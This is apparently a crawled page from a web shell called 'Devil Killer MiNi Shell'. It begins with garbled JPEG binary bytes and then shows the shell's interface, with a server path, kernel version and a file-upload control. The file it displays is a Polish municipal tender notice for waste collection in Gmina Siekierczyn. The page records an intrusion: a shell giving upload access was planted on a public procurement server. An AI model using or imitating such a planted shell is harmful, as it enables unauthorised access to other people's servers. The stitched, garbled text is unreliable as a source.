JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251210/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251210/0059061501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór odpadów komunalnych z terenu Gminy Siekierczyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Siekierczyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821569</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Siekierczyn 271</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siekierczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-818</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757221778</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">756666150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@siekierczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.siekierczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór odpadów komunalnych z terenu Gminy Siekierczyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7b74944b-8f9d-4261-897e-036dc5c703fe</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00590615</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00671639/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór odpadów komunalnych z terenu Gminy Siekierczyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> siekierczyn.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">siekierczyn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej zawarte są na stronie siekierczyn.ezamawiajacy.pl zakładka baza wiedzy i pod linkiem<br/>https://siekierczyn.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_module=main&amp;MP_action=publicFilesList&amp;folder=002c&amp;clientName=siekierczyn&amp; oraz zawarty jest w instrukcji stanwoiacej załacznik numer 11 do SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych, w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, zwane dalej RODO, informuję, że:<br/>1)	Administratorem Pani/Pana danych osobowych jest Urząd Gminy Siekierczyn, Siekierczyn 271, 59-818 Siekierczyn, reprezentowany przez Wójta Gminy Siekierczyn – e-mail: ug@siekierczyn.pl, tel. 75 722 17 78.<br/>2)	Inspektorem Ochrony Danych jest Rafał Wielgus, kontakt e-mail: iod@bhpex.pl, tel.: 68 411 40 00.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO oraz ustawy z dnia 11 września 2019r. Prawo zamówień publicznych (Dz.U.2023.1605 ze zm.) w celu przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego – nr. ZP.271.10.2025<br/>4)	Odbiorcami Pani/Pana danych osobowych będą w szczególności: podmioty współpracujące z Urzędem na podstawie podpisanych umów, osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę z dnia PZP czy organy państwowe upoważnione na podstawie obowiązujących przepisów prawa.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Po tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa, w tym ustaw y z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.).<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym przewidzianym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają ze wspomnianej wyżej ustawy.<br/>7)	Wobec Pani/Pana danych nie będą podejmowane decyzje w sposób zautomatyzowany, dane także nie będą profilowane.<br/>8)	Posiada Pani/Pan prawo do: żądania od administratora dostępu do danych osobowych, prawo do ich sprostowania, ograniczenia przetwarzania, a także do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO<br/>9)	Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>1)	Administrator nie będzie przekazywał danych osobowych do państw trzecich ani organizacji międzynarodowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, z e:<br/>- Zamawiający udostępnia dane osobowe, o kto rych mowa w art. 10 RODO (dane osobowe dotyczące wyroko w skazujących i czyno w zabronionych) w celu umoz liwienia korzystania ze s rodko w ochrony prawnej, o kto rych mowa w dziale IX ustawy Pzp, do<br/>upływu terminu na ich wniesienie.<br/>- Udostępnianie protokołu i załączniko w do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o kto<br/>rych mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub s wiatopoglądowe, przynalez nos c do związko w zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualnos ci lub<br/>orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamowienia.<br/>- W przypadku korzystania przez osobę, kto rej dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o kto rym<br/>mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane<br/>są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o kto rych<br/>mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do pan stwa trzeciego lub organizacji międzynarodowej<br/>oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający<br/>moz e z ądac od osoby występującej z z ądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub<br/>daty zakon czonego postępowania o udzielenie zamo wienia.<br/>- Skorzystanie przez osobę, kto rej dane osobowe dotyczą, z uprawnienia, o kto rym mowa w art. 16 RODO (z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych), nie moz e naruszac integralnos ci protokołu postępowania oraz jego załączniko<br/>w.<br/>- W postępowaniu o udzielenie zamo wienia zgłoszenie z ądania ograniczenia przetwarzania, o kto rym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakon czenia tego postępowania.<br/>- W przypadku gdy wniesienie z ądania dotyczącego prawa, o kto rym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakon czenia<br/>postępowania o udzielenie zamo wienia zamawiający nie udostępnia tych danych, chyba z e zachodzą przesłanki, o kto rych mowa<br/>w art. 18 ust. 2 rozporządzenia 2016/679.<br/>j) dane nie będą przekazywane do Pan stw trzecich ani organizacji międzynarodowych,<br/>k) Podanie danych nie jest obowiązkowe, jednak ich niepodanie będzie wiązało się z brakiem moz liwos ci wzięcia udziału w<br/>Postępowaniu. Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz.U. z 2023 r., poz. 1605 ze zm.).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia stanowi załącznik numer 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi<br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał<br/>spełnienie kryteriów: <br/>Cena - 60% = 60 pkt<br/>Termin wywozu odpadów z Punktu<br/>Selektywnej<br/>Zbiórki Odpadów Komunalnych (PSZOK) - 20% = 20 pkt<br/>Organizacja zajęć informacyjno-edukacyjnych - 20 %=20 pkt<br/>Szczegółowy opis został opisany w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wywozu odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja zajeć informacyjno-edukacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczący/-e:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli Wykonawca jest wpisany<br/>do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym posiadają siedzibę lub miejsce zamieszkania<br/>(np. KRS, CEiDG). Zamawiający będzie mógł zweryfikować warunek za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. <br/><br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający wymaga, aby Wykonawca posiadał:<br/>a)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów<br/>komunalnych od właścicieli nieruchomości prowadzonej przez Wójta Gminy Siekierczyn, o którym mowa w art. 9b ust. 4 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2025 r. poz. 733). Zamawiający oceni spełnienie warunku na podstawie prowadzonego przez siebie rejestru na dzień otwarcia ofert.<br/>b)	Ważne zezwolenie na transport i zbieranie odpadów komunalnych wydane przez właściwy organ, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2023 r. poz. 1587 ze zm.).<br/><br/>Zamawiający będzie mógł zweryfikować warunek za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. <br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Posiadanie przez Wykonawcę odpowiedniego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę nie niższą niż 500 000,00 zł i na okres nie krótszy niż czas trwania umowy– do przedłożenia najpóźniej do dnia podpisania umowy (zgodnie z § 6 wzoru umowy stanowiącej załącznik numer 8 do SWZ)<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonujew sposób ciągły przez okres minimum 12 miesięcy usługę/usługi odpowiadające usłudze stanowiącej przedmiot zamówienia, tj. odbierania i transportu odpadów komunalnych do miejsca ich zagospodarowania o łącznej masie minimum 1500,00 Mg/rok, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane. Wykonawca może dołączyć dowody potwierdzające, że wskazane w wykazie usługi zostały wykonane należycie - <br/><br/>b) Wykonawca obowiązany jest do posiadania przez cały okres realizacji przedmiotu zamówienia wyposażenia umożliwiającego odbieranie odpadów komunalnych<br/>od właścicieli nieruchomości oraz zapewnienia jego odpowiedniego stanu technicznego, oraz sanitarnego polegającego na dysponowaniu co najmniej następującymi pojazdami specjalistycznymi:<br/> - co najmniej dwa samochody przystosowane do odbierania niesegregowanych<br/>(zmieszanych) odpadów komunalnych z funkcją kompaktującą,<br/> - co najmniej dwa samochody przystosowane do odbierania selektywnie zebranych<br/>odpadów komunalnych (zebranych w workach),<br/> - co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej,<br/> - co najmniej jeden samochód wyposażony w urządzenie do mycia i dezynfekcji<br/>pojemników spełniając europejskie standardy emisji spalin co najmniej na poziomie Euro 5. Samochód specjalistyczny powinien umożliwiać wykonanie czynności myjąco-dezynfekujących w miejscu opróżniania pojemników. Usługa powinna być wykonana w taki sposób, aby podczas i po zakończeniu mycia i dezynfekcji pojemnika płyn nie wydostał się na zewnątrz pojazdu,<br/>- co najmniej jeden samochód typu hakowiec, z żurawikiem oraz hakiem do załadunku kontenerów przeznaczonych do odbioru odpadów zbieranych w pojemnikach kontenerowych o pojemności do 34 m³, zabezpieczony przed wysypywaniem i rozwiewaniem odpadów oraz wyposażony w sprzęt do ręcznego uprzątnięcia odpadów, które zostały wysypane z pojemników w trakcie ich opróżniania,<br/>- co najmniej jeden samochód typu bramowiec przeznaczony do odbioru odpadów zebranych w pojemnikach kontenerowych o pojemności do 10 m³, zabezpieczonym przed wysypywaniem i rozwiewaniem odpadów, w tym wyposażonym w żuraw do opróżniania pojemników na surowce wtórne typu „dzwon”, wciągarkę do otwierania pojemników tupu „dzwon”, chwytak do materiałów sypkich,<br/> - co najmniej po jednym samochodzie do odbierania niesegregowanych (zmieszanych) odpadów komunalnych z funkcją kompaktującą oraz samochodem przeznaczonym do odbioru pojemników/worków na odpady zebranych selektywnie, które umożliwią dojazd do trudno dostępnych nieruchomości położonych na terenie Gminy Siekierczyn.<br/><br/> c) Wymieniona ilość sprzętu jest ilością minimalną. Wykonawca zobowiązany jest przez cały okres umowy zapewnić taką ilość sprzętu, aby odpady komunalne z terenu Gminy Siekierczyn były na bieżąco odbierane.<br/> d) Pojazdy używane do realizacji przedmiotu zamówienia muszą być trwale i czytelnie oznakowane w widocznym miejscu nazwą Wykonawcy oraz danymi adresowymi<br/>z numerem telefonu.<br/>e) Pojazdy i urządzenia muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu. Konstrukcja pojazdów musi zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowaniem oddziaływania czynników atmosferycznych na odpady.<br/> f) Pojazdy i urządzenia muszą być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego.<br/> g) Pojazdy muszą być wyposażone:<br/> - w system monitoringu bazujący na systemie pozycjonowania satelitarnego,<br/> - umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, czasie oraz miejscach wyładunku odpadów umożliwiający weryfikację tych danych,<br/>- w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.<br/> h) Wykonawca powinien posiadać oprogramowanie oraz odpowiednie licencje umożliwiające odczyt, prezentację i weryfikację przechowywanych danych oraz udostępnić je na każde żądanie Wójta Gminy Siekierczyn, a także organom kontrolnym.<br/>i) Wykonawca zobowiązany jest do wyposażenia co najmniej jednego pojazdu odbierającego odpady komunalne z pojemników w kamery pozwalające na monitorowanie odbioru odpadów komunalnych, rejestrujące zawartość opróżnionych pojemników oraz trasę przejazdu.<br/>j) Zamawiający w ramach niniejszego zamówienia zastrzega możliwość ważenia pojazdów odbierających odpady komunalne na wadze zamontowanej w Punkcie Selektywnej Zbiórki Odpadów Komunalnych w Siekierczynie. <br/> k) Wykonawca jest zobowiązany do umożliwienia, po uzgodnieniu z Wykonawcą, wstępu<br/>na teren bazy transportowej przedstawicielom Zamawiającego lub pracownikom państwowych instytucji upoważnionych do kontroli realizacji przedmiotu umowy<br/>w ramach posiadanych uprawnień oraz obowiązujących przepisów prawa.<br/> l) Wykonawca jest zobowiązany do udostępnienia Zamawiającemu w dni robocze,<br/>w godzinach pracy Wykonawcy, po wcześniejszym uzgodnieniu dokumentacji związanej<br/>z działalnością objętą przedmiotem zamówienia, w tym zapisów z monitoringu GPS,<br/>w terminie do 2 dni roboczych od otrzymania żądania Zamawiającego.<br/> ł) Wykonawca jest obowiązany posiadać bazę magazynowo - transportową usytuowaną:<br/> - na terenie Gminy Siekierczyn lub w odległości nie większej niż 60 km od granicy gminy,<br/> - na terenie, do którego posiada tytuł prawny,<br/> - oraz spełniać wszystkie wymagania, o których mowa w 